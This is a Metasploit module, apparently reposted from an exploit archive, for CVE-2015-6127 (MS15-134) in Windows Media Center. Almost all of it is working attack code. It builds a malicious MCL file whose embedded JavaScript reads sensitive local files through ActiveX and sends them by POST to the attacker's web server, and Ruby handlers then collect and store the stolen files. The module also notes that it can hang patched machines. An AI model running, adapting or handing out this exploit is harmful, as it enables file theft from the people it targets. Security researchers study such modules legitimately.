## https://sploitus.com/exploit?id=PACKETSTORM:180743
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'cgi'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'MS15-134 Microsoft Windows Media Center MCL Information Disclosure',
'Description' => %q{
This module exploits a vulnerability found in Windows Media Center. It allows an MCL
file to render itself as an HTML document in the local machine zone by Internet Explorer,
which can be used to leak files on the target machine.
Please be aware that if this exploit is used against a patched Windows, it can cause the
computer to be very slow or unresponsive (100% CPU). It seems to be related to how the
exploit uses the URL attribute in order to render itself as an HTML file.
},
'Author' =>
[
'Francisco Falcon', # Vuln discovery & PoCs & Detailed write-ups & awesomeness
'sinn3r'
],
'References' =>
[
['CVE', '2015-6127'],
['MSB', 'MS15-134'],
['URL', 'https://blog.coresecurity.com/2015/12/09/exploiting-windows-media-center/'],
['URL', 'http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference']
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2015-12-08',
))
register_options(
[
OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']),
OptPath.new('FILES', [true, 'Files you wish to download', ::File.join(Msf::Config.data_directory, 'wordlists', 'sensitive_files_win.txt')])
])
end
def receiver_page
@receiver_page_name ||= Rex::Text.rand_text_alpha(5)
end
def js
%Q|
function sendFile(fname, data) {
var xmlHttp = new XMLHttpRequest();
if (!xmlHttp) { return 0; }
xmlHttp.open('POST', '#{get_uri}/#{receiver_page}', true);
xmlHttp.setRequestHeader('Content-type', 'multipart/form-data');
xmlHttp.setRequestHeader('Connection', 'close');
var body = 'fname=' + encodeURIComponent(fname) + '&data=' + data.toString();
xmlHttp.send(body);
}
function getFile(fname) {
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlHttp.open('GET', fname, false);
xmlHttp.send();
return xmlHttp.responseBody.toArray();
}
var files = [#{load_file_paths * ","}];
for (var i=0; i < files.length; i++) {
try {
var data = getFile('file:///' + files[i]);
sendFile(files[i], data);
} catch (e) {}
}
|
end
def generate_mcl
%Q|<application url="#{datastore['FILENAME']}">
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE-edge">
</head>
<body>
<script type="text/javascript">
#{js}
</script>
</body>
</html>
</application>
|
end
def load_file_paths
@files ||= lambda {
buf = ''
::File.open(datastore['FILES'], 'rb') do |f|
buf = f.read
end
buf.split.map { |n| "\"#{n.gsub!(/\\/, '/')}\"" }
}.call
end
def run
exploit
end
def start_service(opts = {})
super
print_status("Generating #{datastore['FILENAME']}...")
mcl = generate_mcl
file_create(mcl)
print_status("Pass #{datastore['FILENAME']} to the target you wish to exploit.")
print_status("When the MCL is executed, it should start sending data (files) back")
print_status("to our web server.")
end
def is_ie?(request)
fp = fingerprint_user_agent(request.headers['User-Agent'])
fp[:ua_name] == HttpClients::IE
end
def parse_data(data)
buf = ''
data.scan(/\d+/).each do |n|
buf << n.to_i.chr
end
buf
end
def parse_body(body)
params = CGI::parse(body)
{
fname: ::File.basename(params['fname'].first),
data: parse_data(params['data'].first)
}
end
def on_request_uri(cli, request)
unless is_ie?(request)
print_error('Client is not Internet Explorer.')
send_not_found(cli)
return
end
unless /#{receiver_page}/i === request.uri
print_error("Unknown request: #{request.uri}")
send_not_found(cli)
return
end
buff = ''
print_status("Receiving data...")
file = parse_body(request.body.to_s)
p = store_loot('mcl.file', 'application/octet-stream', cli.peerhost, file[:data], file[:fname])
print_good("#{file[:fname]} saved as: #{p}")
# If you are kind of lazy to open the saved files, and just sort of want to see the data,
# here you go (handy for debugging purposes, but against a larger network this is probably
# too much info)
vprint_status("File collected: #{file[:fname]}\n\n#{Rex::Text.to_hex_dump(file[:data])}")
end
end